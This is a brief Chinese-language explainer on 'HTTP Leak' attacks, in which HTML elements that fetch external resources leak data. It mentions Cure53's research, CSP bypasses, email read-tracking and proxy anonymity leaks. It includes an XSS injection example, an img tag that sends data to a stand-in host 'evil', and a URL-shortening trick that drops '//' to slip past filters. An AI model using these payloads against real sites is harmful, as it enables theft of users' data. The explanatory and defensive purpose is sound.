HTTP Leak攻击简介
当前Web技术下包含了大量HTML元素和属性,这些HTML元素和属性会请求一些外部资源,而在它们的HTTP请求过程中,可能存在潜在的敏感信息泄露。为此,德国著名网络安全公司Cure53发起了名为HTTP Leaks的攻击方法研究项目(项目参见Github -HttpLeaks),其攻击方法目的在于,枚举出各类HTTP请求中可能存在的信息泄露问题。
另外,某些场景下,还能利用HTTP Leak绕过CSP防护机制,如@filedescriptor的《CSP 2015》,以及@intidc大神的《HTML injection can lead to data theft》。
就比如,在HTTP请求涉及的一些HTML邮件格式中,如果存在HTTP Leak问题,那么,可以利用它来知道收信人是否打开或者阅读了邮件;还有一些Web代理工具,它们声称可以用“匿名”的方式去访问某些网站,但一些HTML元素或属性的重写过程中,就会涉及到外部资源的HTTP请求,如果这其中存在信息泄露问题,那么,其声称的“匿名”保护也就无从谈起了。
简单地说,就是有些HTML元素和属性,这些HTML元素和属性会请求一些外部资源,而在它们的HTTP请求过程中,可能存在潜在的敏感信息泄露
比如:若页面存在xss,注入<img src='evil?data=data'>,可将数据data发送给恶意站点evil,从而泄露敏感信息
小技巧
如果上面那些访问外部资料的url的协议跟本域的一致,则可以省略//,例如
本域:https://test.com
内嵌:<img src=http://evil> --> <img src=http:evil> 等效
参考资料
https://cloud.tencent.com/developer/article/1425667